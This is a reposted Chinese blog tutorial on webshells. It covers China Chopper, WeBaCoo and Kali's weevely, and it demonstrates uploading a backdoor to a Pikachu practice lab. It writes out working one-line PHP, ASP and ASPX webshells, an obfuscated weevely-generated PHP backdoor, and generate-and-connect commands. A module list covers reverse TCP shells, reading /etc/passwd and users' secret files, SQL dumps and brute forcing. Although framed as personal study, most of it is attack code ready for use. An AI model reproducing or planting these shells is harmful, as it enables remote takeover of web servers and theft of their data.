KALI 菜刀weevely基本操作和使用(超級詳細圖解)


本質 : 上傳一句話木馬<?php echo shell_exec($_GET[‘cmd‘]);?>
windows平台
中國菜刀
支持asp、php、asp.net和jsp等
可能被IDS、AV、WAF、掃描器軟件發現查殺
使用方法:
往目標web服務器上傳相應的一句話木馬
asp一句話木馬:      <%execute(request("pass"))%>
php一句話木馬:     <?php @eval($_POST[pass]);?>

            
<?php
  $a = "assert";
  $a($_GET['hacker']);
?>



aspx一句話木馬:   <%@ Page Language="Jscript"%>
            <%eval(Request.Item["pass"])%>  
打開中國菜刀,輸入網址和密碼(一句話木馬中的參數) 連接服務端

Linux平台      WeBaCoo(Web Backdoor Cookie)
獲取的是類終端的shell
通信內容base64編碼后通過cookie頭傳輸,隱蔽性較強
缺點是不能指定密碼
cookie中的參數
cm: base64編碼的命令
cn: 服務器用於返回數據的cookie頭的名
cp: 返回信息定界符
使用方法
1、生成服務器端
wenacoo -g -o a.php
2、上傳后用客戶端進行連接
webacoo -t -u http://1.1.1.1/a.php

下面進入主題

 

個人認為在WIN下,中國菜刀還是很強大的。

但是KALI中也有類似中國菜刀的工具 ——weevely,這里給本人記錄一下,也請大佬們請多多指點……多說無用,直接上菜兒,基本用法步驟如下:
Weevely(只支持PHP)

用http頭進行指令傳輸
隱蔽的類終端PHP Webshell
有30多個管理模塊

執行系統命令、瀏覽文件系統

檢查服務器常見配置錯誤

創建正向、反向TCP Shell連接

通過目標計算機代理HTTP流量

從目標計算機運行端口掃描,滲透內網

支持連接密碼
   1. 0x01
    首先,KALI終端准備開始搞事;
————————————————

 2.0x02
在KALI終端 鍵入命令 weevely 打開工具;(哈哈,我的是4.0.1)
》》》weevely

使用方法
1、生成服務端

weevely generate <password> b.php

生成的文件默認在 /usr/share/weevely/ 目錄下(或者指定目錄或者在當前目錄下執行此命令)

2、 連接客戶端

weevely <URL> <password>

3、 輸入help查看模塊

3.0x03
發現有三個大哥可以用,help其實已經給咱們列出來了,我主用NO.1+NO.3來操作一波。先自動生成后門(path是路徑,password是密碼)

》》》weevely generate limo /root/limo.php


4.0x04
然后在/root 目錄下出現了一個馬兒limo.php,如圖:

 1 <?php
 2 $U='U3($j<$c&U3&$iU3<$l);$U3jU3++,$i++){$o.=U3U3$t{U3$i}^$k{$j}U3;}}returnU3 $o;U3}if U3(@pU3reg_matU3c';
 3 $B='$k="U39U379243f2";$kh="5U3933cU32536992U3";$kf=U3"1U3U3a2bde2dfeU325";U3$p="eMA7SU3nLWVq1EvE6v";fU3uU';
 4 $h='_end_cleaU3n();$r=U3@bU3ase64_eU3ncode(U3@x(@gzcoU3U3mpress($o),$kU3U3));prinU3tU3("$p$kh$r$kf");}';
 5 $x=str_replace('J','','cJreaJteJJ_funcJJtion');
 6 $P='h("/$kh(.+U3)U3$kf/",@fiU3le_get_cU3U3U3ontents("php://inU3put"),$mU3)==1) {U3@ob_stU3arU3t();@evU';
 7 $D='3al(@gzuncomU3pU3resU3s(@x(@bU3ase64_decodeU3($m[U31]),$k))U3);$o=@U3ob_get_U3conteU3nts();U3@U3ob';
 8 $L='3nction xU3($t,$k)U3{$c=stU3rlen($kU3);$l=U3strleU3U3n($t);$o="";U3for($U3i=0;U3$i<$l;){fU3or($j=0;';
 9 $Q=str_replace('U3','',$B.$L.$U.$P.$D.$h);
10 $v=$x('',$Q);$v();
11 ?>
點擊顯示

5.0x05
將自動生成的馬兒上傳目標網站,獲取馬兒路徑,記得運行解析一下(web上傳不懂的可以百度一下,非常非常非常非常非常非常非常多)

這里用皮卡丘靶場做演示

 

 

 

 

 

 
6.0x06
連接web后門 limo.php ,輸入 URL+密碼,進門~whoami(自己測試web,截圖就不發了)
》》》 weevely http://目標/upload/limo.php limo

 

 

 
└─# weevely http://192.168.1.103/pikachu/vul/unsafeupload/uploads/limo.php limo

 

 

 

weevely 成功連接后門。

 

 

 

 

 

 

 

 

 

 

基礎操作不足之處請大佬們多多指點。

 

 

總結一下weevely常用的模塊

system.info                 收集系統信息文件          
file.rm                     刪除文件
file.read                   讀文件
file.upload                 上傳本地文件
file.check                  檢查文件的權限和
file.enum                   在本地詞表的書面枚舉遠程文件
file.download               下載遠程二進制/ASCII文件到本地SQL
sql.query                   執行SQL查詢
sql.console                 啟動SQL控制台
sql.dump                    獲取SQL數據庫轉儲
sql.summary                 獲取SQL數據庫中的表和列后門
backdoor.tcp                TCP端口后門
backdoor.install            安裝后門
backdoor.reverse_tcp        反彈枚舉
audit.user_files            在用戶家中列舉常見的機密文件
audit.user_web_files        列舉常見的Web文件
audit.etc_passwd            枚舉/etc/passwd查找
find.webdir                 查找可寫的web目錄
find.perm                   查找權限可讀/寫/可執行文件和目錄
find.name                   按名稱查找文件和目錄
find.suidsgid               查找SUID/SGID文件和目錄暴破
bruteforce.sql              暴力破解單一SQL用戶
bruteforce.sql_users        暴力破解SQL密碼
bruteforce.ftp              暴力破解單一FTP用戶
bruteforce.ftp_users        暴力破解FTP密碼

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM